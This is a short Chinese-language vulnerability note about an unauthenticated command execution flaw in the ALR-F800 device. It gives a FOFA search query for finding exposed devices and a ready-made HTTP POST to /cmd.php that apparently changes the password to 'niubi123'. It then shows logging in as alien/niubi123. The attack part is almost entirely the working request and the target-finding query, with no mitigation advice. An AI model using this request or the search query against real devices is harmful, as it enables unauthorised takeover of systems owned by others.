登录 白背景
源码

ALR-F800 存在未授权命令执行漏洞

一、漏洞简介

ALR-F800 存在未授权命令执行漏洞

二、影响版本

  • ALR-F800

三、资产测绘

  • fofa"ALR-F800"

1723139711067-72b0e0ab-dc53-46c4-a7ca-2e28db6c9064.png

四、漏洞复现

POST /cmd.php HTTP/1.1
Host: 
Accept-Ldwk: bG91ZG9uZ3dlbmt1
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

cmd=password=niubi123

1723139754409-50a9704c-17dd-4f21-9fdf-beb2a2cd3370.png

alien/niubi123

1723139765433-d406033d-ab69-4c06-ae51-346cba0ece3b.png

原文: https://www.yuque.com/xiaokp7/ocvun2/bqyotwzo1quvq3xm